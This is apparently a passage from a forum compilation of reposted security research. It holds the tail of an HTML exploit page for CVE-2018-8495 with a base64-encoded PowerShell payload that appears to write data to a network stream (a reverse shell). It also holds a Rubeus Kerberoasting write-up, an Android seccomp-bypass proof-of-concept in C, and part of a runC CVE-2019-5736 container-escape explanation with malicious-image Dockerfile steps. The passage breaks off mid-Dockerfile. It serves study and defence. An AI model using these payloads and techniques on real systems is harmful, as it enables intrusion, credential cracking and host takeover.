AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4A 
TABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=;"'>Exploit-it now !</a> <script> window.onkeydown=e=>{ window.onkeydown=z={}; q.click() } </script> </body> </html> Sursa: https://github.com/kmkz/exploit/blob/master/CVE-2018-8495.html
23. Kerberoasting Revisited

Will
Feb 20

Rubeus is a C# Kerberos abuse toolkit that started as a port of @gentilkiwi's Kekeo toolset and has continued to evolve since then. For more information on Rubeus, check out the "From Kekeo to Rubeus" release post, the follow up "Rubeus — Now With More Kekeo", or the recently revamped Rubeus README.md. I've made several recent enhancements to Rubeus, which included me heavily revisiting its Kerberoasting implementation. This resulted in some modifications to Rubeus' Kerberoasting approach(es) as well as an explanation for some previous "weird" behaviors we've seen in the field. Since Kerberoasting is such a commonly used technique, I wanted to dive into detail now that we have a better understanding of its nuances. If you're not familiar with Kerberoasting, there's a wealth of existing information out there, some of which I cover in the beginning of this post. Much of this post won't make complete sense if you don't have a base understanding of how Kerberoasting (or Kerberos) works under the hood, so I highly recommend reading up a bit if you're not comfortable with the concepts. But here's a brief summary of the Kerberoasting process:

- An attacker authenticates to a domain and gets a ticket-granting-ticket (TGT) from the domain controller that's used for later ticket requests.
- The attacker uses their TGT to issue a service ticket request (TGS-REQ) for a particular servicePrincipalName (SPN) of the form sname/host, e.g. MSSqlSvc/SQL.domain.com. This SPN should be unique in the domain, and is registered in the servicePrincipalName field of a user or computer account. During this request process, the attacker can specify what Kerberos encryption types they support (RC4_HMAC, AES256_CTS_HMAC_SHA1_96, etc).
- If the attacker's TGT is valid, the DC extracts information from the TGT and stuffs it into a service ticket. Then the domain controller looks up which account has the requested SPN registered in its servicePrincipalName field.
The service ticket is encrypted with the hash of the account with the requested SPN registered, using the highest-level encryption key that both the attacker and the service account support. The ticket is sent back to the attacker in a service ticket reply (TGS-REP). The attacker extracts the encrypted service ticket from the TGS-REP. Since the service ticket was encrypted with the hash of the account linked to the requested SPN, the attacker can crack this encrypted blob offline to recover the account’s plaintext password.

A note on terminology. The three main encryption key types we’re going to be referring to in this post are RC4_HMAC_MD5 (ARCFOUR-HMAC-MD5, where an account’s NTLM hash functions as the key), AES128_CTS_HMAC_SHA1_96, and AES256_CTS_HMAC_SHA1_96. For conciseness I’m going to refer to these as RC4, AES128, and AES256. Also, all examples here are run from a Windows 10 client, against a Server 2012 domain controller with a 2012 R2 domain functional level.

Kerberoasting Approaches

Kerberoasting generally takes one of two approaches: A standalone implementation of the Kerberos protocol that’s used through a device connected on a network, or via piping the crafted traffic in through a SOCKS proxy. Examples would be Meterpreter or Impacket. This requires credentials for a domain account to perform the roasting, since a TGT needs to be requested for use in the later service ticket requests. Using built-in Windows functionality on a domain-joined host (like the .NET KerberosRequestorSecurityToken class) to request tickets which are then extracted from the current logon session with Mimikatz or Rubeus. Alternatively, a few years ago @machosec realized the GetRequest() method can be used to carve out the service ticket bytes from KerberosRequestorSecurityToken, meaning we can forgo Mimikatz for ticket extraction.
Another advantage of this approach is that the existing user’s TGT is used to request the service tickets, meaning we don’t need plaintext credentials or a user’s hash to perform the Kerberoasting. With Kerberoasting, we really want RC4-encrypted service ticket replies, as these are orders of magnitude faster to crack than their AES equivalents. If we implement the protocol on the attacker side, we can choose to indicate we only support RC4 during the service ticket request process, resulting in the easier-to-crack hash format. On the host side, I used to believe that the KerberosRequestorSecurityToken approach requested RC4 tickets by default as this is typically what is returned, but in fact the “normal” ticket request behavior occurs, with all supported encryption types offered in the request. So why are RC4 hashes usually returned by this approach? Time for a quick detour.

msDS-SupportedEncryptionTypes

One defensive indicator we’ve talked about in the past is “encryption downgrade activity”. As modern domains (functional level 2008 and above) and computers (Vista/2008+) support using AES keys by default in Kerberos exchanges, the use of RC4 in any Kerberos ticket-granting-ticket (TGT) requests or service ticket requests should be an anomaly. Sean Metcalf has an excellent post titled “Detecting Kerberoasting Activity” that covers how to approach DC events to detect this type of behavior, though as he notes “false positives are likely.” The full answer of why false positives are such a problem with this approach also explains some of the “weird” behavior I’ve seen over the years with Kerberoasting. To illustrate, let’s say we have a user account sqlservice that has MSSQLSvc/SQL.testlab.local registered in its servicePrincipalName (SPN) property. We can request a service ticket for this SPN with powershell -C “Add-Type -AssemblyName System.IdentityModel; $Null=New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList ‘MSSQLSvc/SQL.testlab.local’”.
However, the resulting service ticket applied to the current logon session specifies RC4, despite the requesting user’s (harmj0y) TGT using AES256. As stated previously, for a long time I thought the KerberosRequestorSecurityToken approach for some reason specifically requested RC4. However, looking at a Wireshark capture of the TGS-REQ (Kerberos service ticket request) from the client, we see that all proper encryption types including AES are specified as supported: The enc-part in the returned TGS-REP (service ticket reply) is properly encrypted with the requesting client’s AES256 key as we would expect. However, the enc-part we care about for Kerberoasting (contained within the returned service ticket) is encrypted with the RC4 key of the sqlservice account, NOT its AES key: So what’s going on? It turns out that this has nothing to do with the KerberosRequestorSecurityToken method. This method requests a service ticket specified by the supplied SPN so it can build an AP-REQ containing the service ticket for SOAP requests, and we can see above that it performs proper “normal” requests and states it supports AES encryption types. This behavior is due to the msDS-SupportedEncryptionTypes domain object property, something that was talked about a bit by Jim Shaver and Mitchell Hennigan in their DerbyCon “Return From The Underworld: The Future Of Red Team Kerberos” talk. This property is a 32-bit unsigned integer defined in [MS-KILE] 2.2.7 that represents a bitfield with the following possible values: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/6cfc7b50-11ed-4b4d-846d-6f08f0812919 According to Microsoft’s [MS-ADA2], “The Key Distribution Center (KDC) uses this information [msDS-SupportedEncryptionTypes] while generating a service ticket for this account.” So even if a domain supports AES encryption (i.e.
domain functional level 2008 and above) the value of the msDS-SupportedEncryptionTypes field on the account with the requested SPN registered is what determines the encryption level for the service ticket returned in the Kerberoasting process. According to MS-KILE 3.1.1.5 the default value for this field is 0x1C (RC4_HMAC_MD5 | AES128_CTS_HMAC_SHA1_96 | AES256_CTS_HMAC_SHA1_96 = 28) for Windows 7+ and Server 2008R2+. This is why service tickets for machines nearly always use AES256, as the highest mutually supported encryption type will be used in a Kerberos ticket exchange. We can confirm this with the result of a dir \\primary.testlab.local\C$ command followed by Rubeus.exe klist: However, this property is only set by default on computer accounts, not user accounts. If this property is not defined, or is set to 0, [MS-KILE] 3.3.5.7 tells us the default behavior is to use a value of 0x7, meaning RC4 will be used to encrypt the service ticket. So in the previous example for the MSSQLSvc/SQL.testlab.local SPN that’s registered to the user account sqlservice we received a ticket using the RC4 key. If we select “This account supports AES [128/256] bit encryption” in Active Directory Users and Computers, then the msDS-SupportedEncryptionTypes is set to 24, specifying only AES 128/256 encryption should be supported. When I was first looking at this, I assumed that this meant that since the msDS-SupportedEncryptionTypes value was non-null, and the RC4 bit was NOT present, that if you specify only RC4 when requesting a service ticket (via the /tgtdeleg flag here) for an account configured this way the exchange would error out. But guess what? We still get an RC4 (type 23) encrypted ticket that we can crack! A Wireshark capture confirms that RC4 is the only supported etype in the request, and that the ticket enc-part is indeed encrypted with RC4.
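The etype selection rules described above (the [MS-KILE] 2.2.7 bit values, the 0x7 fallback for accounts with the field unset, and "highest mutually supported type wins") can be sketched as a small model. This is illustrative Python, not Rubeus code, and it models only the spec behavior:

```python
# Illustrative model of KDC etype selection (not Rubeus code).
# Bit values from [MS-KILE] 2.2.7; an unset/zero field falls back
# to 0x7 per [MS-KILE] 3.3.5.7.
ETYPE_BITS = {
    0x01: "DES_CBC_CRC",
    0x02: "DES_CBC_MD5",
    0x04: "RC4_HMAC",
    0x08: "AES128_CTS_HMAC_SHA1_96",
    0x10: "AES256_CTS_HMAC_SHA1_96",
}
DEFAULT_WHEN_UNSET = 0x7  # DES_CBC_CRC | DES_CBC_MD5 | RC4_HMAC

def supported_etypes(ms_ds_value):
    """Expand an msDS-SupportedEncryptionTypes value into etype names."""
    value = ms_ds_value or DEFAULT_WHEN_UNSET
    return [name for bit, name in sorted(ETYPE_BITS.items()) if value & bit]

def service_ticket_etype(client_bits, account_value):
    """Highest etype supported by both the requestor and the SPN account
    (higher bit values happen to correspond to stronger etypes here)."""
    common = client_bits & (account_value or DEFAULT_WHEN_UNSET)
    if not common:
        return None  # KDC_ERR_ETYPE_NOTSUPP
    return ETYPE_BITS[1 << (common.bit_length() - 1)]

# Computer account default 0x1C (= 28): RC4 + AES128 + AES256
print(supported_etypes(0x1C))
# User account with the field unset: RC4 is the best the KDC will use,
# even though the client offered AES
print(service_ticket_etype(0x1C, None))  # RC4_HMAC
# "This account supports AES..." checked in ADUC sets the value to 24
print(service_ticket_etype(0x1C, 24))    # AES256_CTS_HMAC_SHA1_96
```

Per this model, an RC4-only request against an AES-only account (service_ticket_etype(0x04, 24)) yields None, i.e. KDC_ERR_ETYPE_NOTSUPP; as noted above, though, real DCs observed in testing still fell back to RC4.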
¯\_(ツ)_/¯ I’m assuming that this is for failsafe backwards compatibility reasons, and I ran this scenario in multiple test domains with the same result. However, someone else I asked to recreate it wasn’t able to, so I’m not sure if I’m missing something or if this accurately reflects normal domain behavior. If anyone has any more information on this, or is/isn’t able to recreate it, please let me know! Why does the above matter? If true, it implies that there doesn’t seem to be an easy way to disable RC4_HMAC on user accounts. This means that even if you enable AES encryption for user accounts with servicePrincipalName fields set, these accounts are still Kerberoastable with the hacker-friendly RC4 flavor of encryption keys! After a bit of testing, it appears that if you disable RC4 at the domain/domain controller level as described in this post, then requesting an RC4 service ticket for any account will fail with KDC_ERR_ETYPE_NOTSUPP. However, TGT requests will no longer work with RC4 either. As this might cause lots of things to break, definitely try this in a lab environment first before making any changes in production. Sidenote: the msDS-SupportedEncryptionTypes property can also be set for trustedDomain objects that represent domain trusts, but it is also initially undefined. This is why inter-domain trust tickets end up using RC4 by default: However, like with user objects, this behavior can be changed by modifying the properties of the trusted domain object, specifying that the foreign domain supports AES: This sets msDS-SupportedEncryptionTypes on the trusted domain object to a value of 24 (AES128_CTS_HMAC_SHA1_96 | AES256_CTS_HMAC_SHA1_96), meaning that AES256 inter-domain trust tickets will be issued by default:

Trying to Build a Better Kerberoast

Due to the way we tend to execute engagements, we often lean towards abusing host-based functionality versus piping in our own protocol implementation from an attacker server.
We oftentimes operate over high-latency command and control, so for complex multi-party exchanges like Kerberos our personal preference has traditionally been the KerberosRequestorSecurityToken approach for Kerberoasting. But as I mentioned in the first section, this method requests the highest supported encryption type when requesting a service ticket. For user accounts that have AES enabled, this default method will return a ticket with an encryption type of AES256 (type 18 in the hash): Now, an obvious alternative method for Rubeus’ Kerberoasting would be to allow an existing TGT blob/file to be specified that would then be used in the ticket requests. If we have a real TGT and are implementing the raw TGS-REQ/TGS-REP process and extracting out the proper encrypted parts manually, we can specify whatever encryption type support we want when issuing the service ticket request. So if we have AES-enabled accounts, we can still get an RC4-based ticket to crack offline! This approach is in fact now implemented in Rubeus with the /ticket:<blob/file.kirbi> parameter for the kerberoast command. So what’s the disadvantage here? Well, you need a ticket-granting-ticket to build the raw TGS-REQ service ticket request, so you need to either a) be elevated on a system and extract out another user’s TGT or b) have a user’s hash that you use with the asktgt module to request a new TGT. If you’re curious why a user can’t extract out a usable version of their TGT without elevation, check out the explanation in the “Rubeus — Now With More Kekeo” post. The solution is @gentilkiwi’s Kekeo tgtdeleg trick, which uses the Kerberos GSS-API to request a “fake” delegation for a target SPN that has unconstrained delegation enabled (e.g. cifs/DC.domain.com). This was previously implemented in Rubeus with the tgtdeleg command. This approach allows us to extract a usable TGT for the current user, including the session key.
Why don’t we then use this “fake” delegation TGT when performing our TGS-REQs for “vulnerable” SPNs, specifying RC4 as the only encryption algorithm we support? The new kerberoast /tgtdeleg option does just that! There have also been times in the field where the default KerberosRequestorSecurityToken Kerberoasting method has just failed; we’re hoping that the /tgtdeleg option may work in some of these situations. If we want to go a bit further and avoid the possible “encryption downgrade” indicator, we can search for accounts that don’t have AES encryption types supported, and then state we support all encryption types in the service ticket request. Since the highest supported encryption type for the results will be RC4, we’ll still get crackable tickets. The kerberoast /rc4opsec command executes the tgtdeleg trick and filters out any of these AES-enabled accounts: If we want the opposite and only want AES-enabled accounts, the /aes flag will apply the opposite LDAP filter. While we don’t currently have tools to crack tickets that use AES (and even once we do, speeds will be thousands of times slower due to the AES key derivation algorithms), progress is being made. Another advantage of the /tgtdeleg approach for Kerberoasting is that since we’re building and parsing the TGS-REQ/TGS-REP traffic manually, the service tickets won’t be cached on the system we’re roasting from. The default KerberosRequestorSecurityToken method results in a service ticket cached in the current logon session for every SPN we’re roasting. The /tgtdeleg approach results in a single additional cifs/DC.domain.com ticket being added to the current logon session, minimizing a potential host-based indicator (i.e. massive numbers of service tickets in a user’s logon session). As a reference, in the README I built a table comparing the different Rubeus Kerberoasting approaches: As a final note, Kerberoasting should work much better over domain trusts as of this commit.
Two foreign trusted domain examples have been added to the kerberoast section of the README. Conclusion Hopefully this cleared up some of the confusion some (like me) may have had surrounding different encryption support in regards to Kerberoasting. I’m also eager for people to try out the new Rubeus roasting options to see how they work in the field. As always, if I made some mistake in this post, let me know and I’ll correct it as soon as I can! Also, if anyone has insight on the RC4-tickets-still-being-issued-for-AES-only-accounts situation, please shoot me an email (will [at] harmj0y.net) or hit me up in the BloodHound Slack. Sursa: https://posts.specterops.io/kerberoasting-revisited-d434351bd4d1
  24. /* The seccomp.2 manpage (http://man7.org/linux/man-pages/man2/seccomp.2.html) documents: Before kernel 4.8, the seccomp check will not be run again after the tracer is notified. (This means that, on older kernels, seccomp-based sandboxes must not allow use of ptrace(2)—even of other sandboxed processes—without extreme care; ptracers can use this mechanism to escape from the seccomp sandbox.) Multiple existing Android devices with ongoing security support (including Pixel 1 and Pixel 2) ship kernels older than that; therefore, in a context where ptrace works, seccomp policies that don't blacklist ptrace can not be considered to be security boundaries. The zygote applies a seccomp sandbox to system_server and all app processes; this seccomp sandbox permits the use of ptrace: ================ ===== filter 0 (164 instructions) ===== 0001 if arch == AARCH64: [true +2, false +0] [...] 0010 if nr >= 0x00000069: [true +1, false +0] 0012 if nr >= 0x000000b4: [true +17, false +16] -> ret TRAP 0023 ret ALLOW (syscalls: init_module, delete_module, timer_create, timer_gettime, timer_getoverrun, timer_settime, timer_delete, clock_settime, clock_gettime, clock_getres, clock_nanosleep, syslog, ptrace, sched_setparam, sched_setscheduler, sched_getscheduler, sched_getparam, sched_setaffinity, sched_getaffinity, sched_yield, sched_get_priority_max, sched_get_priority_min, sched_rr_get_interval, restart_syscall, kill, tkill, tgkill, sigaltstack, rt_sigsuspend, rt_sigaction, rt_sigprocmask, rt_sigpending, rt_sigtimedwait, rt_sigqueueinfo, rt_sigreturn, setpriority, getpriority, reboot, setregid, setgid, setreuid, setuid, setresuid, getresuid, setresgid, getresgid, setfsuid, setfsgid, times, setpgid, getpgid, getsid, setsid, getgroups, setgroups, uname, sethostname, setdomainname, getrlimit, setrlimit, getrusage, umask, prctl, getcpu, gettimeofday, settimeofday, adjtimex, getpid, getppid, getuid, geteuid, getgid, getegid, gettid, sysinfo) 0011 if nr >= 0x00000068: [true +18,
false +17] -> ret TRAP 0023 ret ALLOW (syscalls: nanosleep, getitimer, setitimer) [...] 002a if nr >= 0x00000018: [true +7, false +0] 0032 if nr >= 0x00000021: [true +3, false +0] 0036 if nr >= 0x00000024: [true +1, false +0] 0038 if nr >= 0x00000028: [true +106, false +105] -> ret TRAP 00a2 ret ALLOW (syscalls: sync, kill, rename, mkdir) 0037 if nr >= 0x00000022: [true +107, false +106] -> ret TRAP 00a2 ret ALLOW (syscalls: access) 0033 if nr >= 0x0000001a: [true +1, false +0] 0035 if nr >= 0x0000001b: [true +109, false +108] -> ret TRAP 00a2 ret ALLOW (syscalls: ptrace) 0034 if nr >= 0x00000019: [true +110, false +109] -> ret TRAP 00a2 ret ALLOW (syscalls: getuid) [...] ================ The SELinux policy allows even isolated_app context, which is used for Chrome's renderer sandbox, to use ptrace: ================ # Google Breakpad (crash reporter for Chrome) relies on ptrace # functionality. Without the ability to ptrace, the crash reporter # tool is broken. # b/20150694 # https://code.google.com/p/chromium/issues/detail?id=475270 allow isolated_app self:process ptrace; ================ Chrome applies two extra layers of seccomp sandbox; but these also permit the use of clone and ptrace: ================ ===== filter 1 (194 instructions) ===== 0001 if arch == AARCH64: [true +2, false +0] [...] 0002 if arch != ARM: [true +0, false +60] -> ret TRAP [...] 0074 if nr >= 0x0000007a: [true +1, false +0] 0076 if nr >= 0x0000007b: [true +74, false +73] -> ret TRAP 00c0 ret ALLOW (syscalls: uname) 0075 if nr >= 0x00000079: [true +75, false +74] -> ret TRAP 00c0 ret ALLOW (syscalls: fsync, sigreturn, clone) [...] 004d if nr >= 0x0000001a: [true +1, false +0] 004f if nr >= 0x0000001b: [true +113, false +112] -> ret TRAP 00c0 ret ALLOW (syscalls: ptrace) [...] ===== filter 2 (449 instructions) ===== 0001 if arch != ARM: [true +0, false +1] -> ret TRAP [...] 
00b6 if nr < 0x00000019: [true +4, false +0] -> ret ALLOW (syscalls: getuid) 00b7 if nr >= 0x0000001a: [true +3, false +8] -> ret ALLOW (syscalls: ptrace) 01c0 ret TRAP [...] 007f if nr >= 0x00000073: [true +0, false +5] 0080 if nr >= 0x00000076: [true +0, false +2] 0081 if nr < 0x00000079: [true +57, false +0] -> ret ALLOW (syscalls: fsync, sigreturn, clone) [...]
================

Therefore, this not only breaks the app sandbox, but can probably also be used to break part of the isolation of a Chrome renderer process. To test this, build the following file (as an aarch64 binary) and run it from app context (e.g. using connectbot):

================
*/
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <err.h>
#include <signal.h>
#include <sys/ptrace.h>
#include <errno.h>
#include <sys/wait.h>
#include <sys/syscall.h>
#include <sys/user.h>
#include <linux/elf.h>
#include <asm/ptrace.h>
#include <sys/uio.h>

int main(void) {
  setbuf(stdout, NULL);

  /* Child: spin on gettid(); any result that isn't our own pid means
   * the pending syscall was rewritten by the tracer. */
  pid_t child = fork();
  if (child == -1)
    err(1, "fork");
  if (child == 0) {
    pid_t my_pid = getpid();
    while (1) {
      errno = 0;
      int res = syscall(__NR_gettid, 0, 0);
      if (res != my_pid) {
        printf("%d (%s)\n", res, strerror(errno));
      }
    }
  }

  sleep(1);

  /* Parent: attach and stop the child at the next syscall entry.
   * The seccomp check has already passed at this point. */
  if (ptrace(PTRACE_ATTACH, child, NULL, NULL))
    err(1, "ptrace attach");
  int status;
  if (waitpid(child, &status, 0) != child)
    err(1, "wait for child");
  if (ptrace(PTRACE_SYSCALL, child, NULL, NULL))
    err(1, "ptrace syscall entry");
  if (waitpid(child, &status, 0) != child)
    err(1, "wait for child");

  /* Rewrite the pending gettid() into swapon(), a syscall the seccomp
   * policy would never have allowed directly. */
  int syscallno;
  struct iovec iov = { .iov_base = &syscallno, .iov_len = sizeof(syscallno) };
  if (ptrace(PTRACE_GETREGSET, child, NT_ARM_SYSTEM_CALL, &iov))
    err(1, "ptrace getregs");
  printf("seeing syscall %d\n", syscallno);
  if (syscallno != __NR_gettid)
    errx(1, "not gettid");
  syscallno = __NR_swapon;
  if (ptrace(PTRACE_SETREGSET, child, NT_ARM_SYSTEM_CALL, &iov))
    err(1, "ptrace setregs");
  if (ptrace(PTRACE_DETACH, child, NULL, NULL))
    err(1, "ptrace detach");
  kill(child, SIGCONT);

  sleep(5);
  kill(child, SIGKILL);
  return 0;
}
/*
================
If the attack works, you'll see "-1 (Operation not permitted)", which indicates that the seccomp filter for swapon() was bypassed and the kernel's capability check was reached. For comparison, the following (a straight syscall to swapon()) fails with SIGSYS:

================
#include <unistd.h>
#include <sys/syscall.h>

int main(void) {
  syscall(__NR_swapon, 0, 0);
}
================

Attaching screenshot from connectbot. I believe that a sensible fix would be to backport the behavior change that occurred in kernel 4.8 to Android's stable branches.
*/

Sursa: https://www.exploit-db.com/exploits/46434
  25. Breaking out of Docker via runC – Explaining CVE-2019-5736 Feb 21, 2019 by Yuval Avrahami Last week (2019-02-11) a new vulnerability in runC was reported by its maintainers, originally found by Adam Iwaniuk and Borys Poplawski. Dubbed CVE-2019-5736, it affects Docker containers running in default settings and can be used by an attacker to gain root-level access on the host. Aleksa Sarai, one of runC’s maintainers, found that the same fundamental flaw exists in LXC. As opposed to Docker though, only privileged LXC containers are vulnerable. Both runC and LXC were patched and new versions were released. The vulnerability gained a lot of traction and numerous technology sites and commercial companies addressed it in dedicated posts. Here at Twistlock, our CTO John Morello wrote an excellent piece with all the relevant details and the mitigations offered by the Twistlock platform. Initially, the official exploit code wasn’t to be released publicly until 2019-02-18, in order to prevent malicious parties from weaponizing it before users have had some time to update. In the following days though, several people decided to release their own exploit code. That led the runC team to eventually release their exploit code earlier (2019-02-13) since – as they put it – “the cat was out of the bag”. This post aims to be a comprehensive technical deep dive into the vulnerability and its various exploitation methods.

So What Is runC?

RunC is a container runtime originally developed as part of Docker and later extracted out as a separate open source tool and library. As a “low level” container runtime, runC is mainly used by “high level” container runtimes (e.g. Docker) to spawn and run containers, although it can be used as a stand-alone tool.
“High level” container runtimes like Docker will normally implement functionalities such as image creation and management and will use runC to handle tasks related to running containers – creating a container, attaching a process to an existing container (docker exec) and so on.

Procfs

To understand the vulnerability, we need to go over some procfs basics. The proc filesystem is a virtual filesystem in Linux that presents information primarily about processes, typically mounted to /proc. It is virtual in the sense that it does not exist on disk. Instead, the kernel creates it in memory. It can be thought of as an interface to system data that the kernel exposes as a filesystem. Each process has its own directory in procfs, at /proc/[pid]: As shown in the image above, /proc/self is a symbolic link to the directory of the currently running process (in this case pid 177). Each process’s directory contains several files and directories with information on the process. For the vulnerability, the relevant ones are: /proc/self/exe – a symbolic link to the executable file the process is running; and /proc/self/fd – a directory containing the file descriptors open by the process. For example, by listing the files under /proc/self using ls /proc/self one can see that /proc/self/exe points to the ‘ls’ executable. That makes sense as the one accessing /proc/self is the ‘ls’ process that our shell spawned.

The Vulnerability

Let’s go over the vulnerability overview given by the runC team: The vulnerability allows a malicious container to (with minimal user interaction) overwrite the host runc binary and thus gain root-level code execution on the host. The level of user interaction is being able to run any command ... as root within a container in either of these contexts: Creating a new container using an attacker-controlled image. Attaching (docker exec) into an existing container which the attacker had previous write access to.
Those two scenarios might seem different, but both require runC to spin up a new process in a container and are implemented similarly. In both cases, runC is tasked with running a user-defined binary in the container. In Docker, this binary is either the image’s entry point when starting a new container, or docker exec’s argument when attaching to an existing container. When this user binary is run, it must already be confined and restricted inside the container, or it can jeopardize the host. In order to accomplish that, runC creates a ‘runC init’ subprocess which places all needed restrictions on itself (such as entering or setting up namespaces) and effectively places itself in the container. Then, the runC init process, now in the container, calls the execve syscall to overwrite itself with the user-requested binary. This is the method used by runC both for creating new containers and for attaching a process to an existing container. The researchers who revealed the vulnerability discovered that an attacker can trick runC into executing itself by asking it to run /proc/self/exe, which is a symbolic link to the runC binary on the host. An attacker with root access in the container can then use /proc/[runc-pid]/exe as a reference to the runC binary on the host and overwrite it. Root access in the container is required to perform this attack as the runC binary is owned by root. The next time runC is executed, the attacker will achieve code execution on the host. Since runC is normally run as root (e.g. by the Docker daemon), the attacker will gain root access on the host.

Why not runC init?

The image above might mislead some to believe the vulnerability (i.e. tricking runC into executing itself) is redundant. That is, why can’t an attacker simply overwrite /proc/[runc-pid]/exe instead? A patch for a similar runC vulnerability, CVE-2016-9962, mitigates this kind of attack.
CVE-2016-9962 revealed that the runC init process possessed open file descriptors from the host which could be used by an attacker in the container to traverse the host’s filesystem and thus break out of the container. Part of the patch for this flaw was setting the runc init process as ‘non-dumpable’ before it enters the container. In the context of CVE-2019-5736, the ‘non-dumpable’ flag prevents other processes from dereferencing /proc/[pid]/exe, and therefore mitigates overwriting the runC binary through it [1]. Calling execve drops this flag though, and hence the new runC process’ /proc/[runc-pid]/exe is accessible.

The Symlink Problem

The vulnerability may appear to contradict the way symbolic links are implemented in Linux. Symbolic links simply hold the path to their target. For a runC process, /proc/self/exe should contain something like /usr/sbin/runc. When a symlink is accessed by a process, the kernel uses the path present in the link to find the target under the root of the accessing process. That begs the question – when a process in the container opens the symbolic link to the runC binary, why doesn’t the kernel search for the runC path inside the container root? The answer is that /proc/[pid]/exe does not follow the normal semantics for symbolic links. Technically this might count as a violation of POSIX, but as I mentioned earlier procfs is a special filesystem. When a process opens /proc/[pid]/exe, there is none of the normal procedure of reading and following the contents of a symlink. Instead, the kernel just gives you access to the open file entry directly.

Exploitation

Soon after the vulnerability was reported, when no POCs were publicly released yet, I attempted to develop my own POC based on the detailed description of the vulnerability given in the LXC patch addressing it. You can find the complete POC code here.
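The special /proc/[pid]/exe semantics described above can be poked at with a short Linux-only Python sketch (the "copied-python" name and the sleep timings are arbitrary choices for illustration): even after the on-disk binary is unlinked, the exe entry still opens the running file directly, where an ordinary symlink to the same path would dangle.

```python
import os
import shutil
import subprocess
import sys
import tempfile
import time

# Copy the Python interpreter to a scratch path and run it from there,
# standing in for "a binary whose /proc/[pid]/exe we want to inspect".
scratch = tempfile.mkdtemp()
target = os.path.join(scratch, "copied-python")
shutil.copy2(sys.executable, target)

child = subprocess.Popen([target, "-c", "import time; time.sleep(30)"])
time.sleep(1)  # give the child time to execve the copied binary

exe_link = "/proc/%d/exe" % child.pid
linkpath = os.readlink(exe_link)
print(linkpath)  # .../copied-python

# Unlink the on-disk binary; /proc/[pid]/exe still opens the file the
# process is running, bypassing normal path-based symlink resolution.
os.unlink(target)
with open(exe_link, "rb") as f:
    header = f.read(4)
print(header)  # b'\x7fELF'

child.kill()
child.wait()
```

This is exactly the property the attack relies on: the container's root does not matter, because opening /proc/[runc-pid]/exe hands back the host's runC file entry directly.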
Let’s break down LXC’s description of the vulnerability: when runC attaches to a container the attacker can trick it into executing itself. This could be done by replacing the target binary inside the container with a custom binary pointing back at the runC binary itself. As an example, if the target binary was /bin/bash, this could be replaced with an executable script specifying the interpreter path #!/proc/self/exe The ‘#!’ syntax is called shebang and is used in scripts to specify an interpreter. When the Linux loader encounters the shebang, it runs the interpreter instead of the executable. As seen in the video, the program finally executed by the loader is: interpreter [optional-arg] executable-path When the user runs something like docker exec container-name /bin/bash, the loader will recognize the shebang in the modified bash and execute the interpreter we specified – /proc/self/exe, which is a symlink to the runC binary. We can proceed to overwrite the runC binary from a separate process in the container through /proc/[runc-pid]/exe. The attacker can then proceed to write to the target of /proc/self/exe to try and overwrite the runC binary on the host. However in general, this will not succeed as the kernel will not permit it to be overwritten whilst runC is executing. Basically, we cannot overwrite the runC binary while a process is running it. On the other hand, if the runC process exits, /proc/[runc-pid]/exe will vanish and we will lose the reference to the runC binary. To overcome this, we open /proc/[runc-pid]/exe for reading in our process, which creates a file descriptor at /proc/[our-pid]/fd/3. We then wait for the runC process to exit, and proceed to open /proc/[our-pid]/fd/3 for writing, and overwrite runC. Here is the code for overwrite_runc, shortened for brevity: Let’s see some action! The exploit output shows the steps taken to overwrite runC. You can see that the runC process is running as pid 20054. The video can also be seen here. 
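The file descriptor trick just described can be sketched in a few lines of Linux-only Python, using a scratch file as a stand-in for the runC binary (the "fake-runc" path and the payload are made up for illustration):

```python
import os
import tempfile

# Stand-in "runC binary": a scratch file we will overwrite purely
# through procfs, never through its pathname.
path = os.path.join(tempfile.mkdtemp(), "fake-runc")
with open(path, "w") as f:
    f.write("original binary contents")

# Step 1: open the target read-only. This parks a descriptor in our
# /proc/self/fd/ directory, just as the POC opens /proc/[runc-pid]/exe.
fd = os.open(path, os.O_RDONLY)

# Step 2: the name-based reference disappears (for the real attack,
# runC exiting makes /proc/[runc-pid]/exe vanish); here we unlink it.
os.unlink(path)

# Step 3: re-open our *own* descriptor for writing via procfs and
# overwrite the target, even though we only ever held it read-only.
with open("/proc/self/fd/%d" % fd, "w") as f:
    f.write("#!/bin/sh\necho pwned\n")

# The original read-only descriptor now sees the overwritten contents.
data = os.read(fd, 100).decode()
print(data)
```

The re-open through /proc/self/fd performs a fresh permission check against the file's mode rather than the original open flags, which is why a read-only descriptor can be "upgraded" this way; in the real attack that check is what makes root in the container a prerequisite.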
This method has one setback though – it requires an additional process to run the attacker code. Since containers are started with only one process (i.e. the Docker image’s entry point), this approach couldn’t be used to create a malicious image that will compromise the host when run. Some other POCs you might have seen that implement a similar approach are Frichetten’s and feexd’s.

Shared Libraries Approach

A different exploitation method is used in the official POC released by runC’s maintainers and is superior to POCs similar to mine since it can be implemented to compromise the host through two separate methods: When a user execs a command into an existing attacker-controlled container. When a user runs a malicious image. We’ll now look into building a malicious image since the previous POC already demonstrated the first scenario. The POC I wrote for this method is heavily based on q3k’s POC, which, to the best of my knowledge, was the first published malicious image POC. You can view the full POC code here. Let’s go over the Dockerfile used to build the malicious image. First, the entry point of the image is set to /proc/self/exe in order to trick runC into executing itself when the image is run.

# Create a symbolic link to /proc/self/exe and set it as the image entrypoint
RUN set -e -x ;\
    ln -s /proc/self/exe /entrypoint
ENTRYPOINT [ "/entrypoint" ]
RunC is dynamically linked to several shared libraries at run time, which can be listed using the ldd command. When the runC process is executed in the container, those libraries are loaded into the runC process by the dynamic linker. It is possible to substitute one of those libraries with a malicious version, that will overwrite the runC binary upon being loaded into the runC process. Our Dockerfile builds a malicious version of the libseccomp library:

# Append the run_at_link function to the libseccomp-2.3.1/src/api.c file and build libseccomp
ADD run_at_link.c /root/run_at_link.c
RUN set -e -x ;\
    cd /root/libseccomp-2.3.1 ;\
